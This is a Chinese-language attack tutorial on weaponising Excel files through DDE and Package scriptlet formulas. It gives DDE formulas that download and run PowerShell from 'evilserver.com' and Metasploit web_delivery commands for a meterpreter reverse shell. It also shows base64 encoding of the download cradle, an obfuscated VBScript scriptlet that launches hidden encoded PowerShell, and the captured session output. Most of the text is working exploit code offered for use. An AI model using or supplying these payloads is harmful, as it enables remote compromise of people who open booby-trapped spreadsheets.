0x00 基础
DDE可以通过Excel工作表公式执行任意命令,但是也有两个缺点.需要交互
1.启动时会提醒 启动内容
2.第二次打开时 更新内容
DDE通过进程通信.为了保证实时更新,允许从Excel内部调用应用程序,甚至可以通过Web请求将实时数据返回
而且可执行文件的名称和参数有一些长度限制,可能无法直接从DDE执行PowerShell.exe,但可以通过将PowerShell.exe作为参数传递给cmd.exe来完成此操作。这会将更多的字节添加到已经受限的1024字节参数长度中,1024是CreateProcess()函数的最大cmd长度。
1
2
3
4
5
|
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://evilserver.com/sp.base64\");powershell -e $e'!A1
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://evilserver.com/sp.ps1");IEX $e'!A1
=cmd|'/c \\evilserver.com\sp.bat;IEX $e'!A1
|
当然除了下面演示的反弹shell还有更多玩法
例如: 直接使用execl提权等等
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1
https://www.youtube.com/watch?v=fzyK6RFNfDU
0x01 MSF生成powershell脚本
原文地址:https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/
1
2
3
4
5
6
7
8
9
10
11
12
|
use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.2
set lport 22222
set srvhost 10.10.10.2
set target 2
set ssl true
run -j
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN'); |
0x02 特殊字符转换
注意:
powershell中base64编码用utf8转base64会执行失败
utf8 > base64 False
utf16-le > base64 True
bash
注意:这里我用的双引号和单引号请区分.上面payload中url是单引号,被我更改成双引号了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# echo '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring("https://10.10.10.2:8080/QpxuaN")' |iconv --to-code UTF-16LE|base64
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACIAKQAKAA
或者先保存成payload.txt //记得换行
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$l=new-object net.webclient;
$l.proxy=[Net.WebRequest]::GetSystemWebProxy();
$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')
# cat payload.txt|iconv --to-code UTF-16LE|base64
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsACgAkAGwAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAJABsAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AAoAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsACgBJAEUAWAAgACQAbAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAMAAuADEAMAAuADEAMAAuADIAOgA4ADAAOAAwAC8AUQBwAHgAdQBhAE4AJwApAAoA
|
python
1
2
3
4
5
6
7
8
9
10
11
|
In [1]: import base64
In [2]: x = "[System.Net.ServicePointManager]::ServerCertificateValidationCallba
...: ck={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSys
...: temWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredent
...: ials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
In [3]: y = x.encode('UTF-16LE')
In [4]: base64.encode(y)
In [5]: base64.b64encode(y)
Out[5]: 'WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA='
|
powershell[1]
1
2
3
|
PS> (cmd /c echo {[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')}).split('')[1]
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA=
|
powershell[2]
1
2
3
4
5
6
|
PS> $command="[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('https://10.10.10.2:8080/QpxuaN')"
PS> $byte=[System.Text.Encoding]::Unicode.GetBytes($command)
PS> $encodecomand=[Convert]::ToBase64String($byte)
PS> echo $encodecomand
WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7AFQAcgB1AGUAfQA7AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AEkARQBYACAALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA=
|
其他类型
https://github.com/danielbohannon/Invoke-Obfuscation
https://04z.net/archives/bf627292.html
0x03 将脚本内容保存到xml文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
<?XML version="1.0"?>
<scriptlet>
<registration
description="KH9uSJNGgLpeK"
progid="aLqKTT.ba9f0i"
version="1.0"
classid="{D77A5972-210E-4FD6-BC1E-6094A40A1025}" remotable="true">
</registration>
<script language="VBScript">
<![CDATA[
if not vLQ then
dim tZnIOJNSxlFdPBXvNMkpDqNa : DiM xZdwuEqRiLPWuENFURdUOisq : Set tZnIOJNSxlFdPBXvNMkpDqNa = creaTEobjEcT(StrReverse(ChrW(&H57)) & ChrW(&H53) & Chr(&H63) & ChrW(&H72) & Chr(&H69) & StrReverse(Chr(&H70)) & ChrW(&H54) & StrReverse(Chr(&H2E)) & StrReverse(Chr(&H53)) & Chr(&H48) & StrReverse(ChrW(&H65)) & ChrW(&H6C) & ChrW(&H4C)):xZdwuEqRiLPWuENFURdUOisq=" poWERSHelL.EXe -ex ByPAss -noP -W Hidden -Ec WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABsAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAGwALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAGwALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADAALgAxADAALgAxADAALgAyADoAOAAwADgAMAAvAFEAcAB4AHUAYQBOACcAKQA= ":tZnIOJNSxlFdPBXvNMkpDqNa.rUn ChR(34)&tZnIOJNSxlFdPBXvNMkpDqNa.eXPaNDEnVIROnMENtStrinGs(StrReverse(ChrW(&H25)) & ChrW(&H43) & StrReverse(ChrW(&H4F)) & Chr(&H6D) & StrReverse(Chr(&H53)) & Chr(&H70) & StrReverse(ChrW(&H65)) & Chr(&H43) & StrReverse(ChrW(&H25)))&cHR(34)&CHR(34)&ChrW(&H2F) & StrReverse(Chr(&H43)) & Chr(&H20)&xZdwuEqRiLPWuENFURdUOisq&CHR(34),0:set tZnIOJNSxlFdPBXvNMkpDqNa = noThIng
end if
Function vLQ
Dim vFVw
Dim vdbGCrvsiz
Dim vUC
Set vFVw = GetObject("winmgmts:\\.\root\cimv2").ExecQuery(_
"Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
For Each vdbGCrvsiz in vFVw
If Instr(1,vdbGCrvsiz.CommandLine, WScript.ScriptName,1)> 0 Then
vUC = vUC + 1
End If
Next
vLQ = (vUC > 1)
End Function
]]>
</script>
</scriptlet>
|
0x04 使用python等开启http服务器
php -S 0.0.0.0:8081
python -m SimpleHTTPServer 8081
那么获取到x.xml的链接为http://10.10.10.2:8081/x.xml
0x05 新建一个execl.在任意处粘贴以下内容保存即可
=Package|'script:http://10.10.10.2:8081/x.xml'!''''
0x06 打开execl
记得允许启动内容.或者更新内容
1
2
3
4
5
6
7
|
[*] Sending stage (179779 bytes) to 10.10.10.27
[*] Meterpreter session 1 opened (10.10.10.2:22222 -> 10.10.10.27:49956) at 2017-12-19 20:45:30 +0800
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: X\evi1ox |
https://www.youtube.com/watch?v=P-iCeH3qNLw
http://staaldraad.github.io/2017/10/23/msword-field-codes/
http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://gist.githubusercontent.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980/raw/0a3b7af41ac8c9a975cfeff2ab21c7eb5e6857a1/Modified-MS16-032.ps1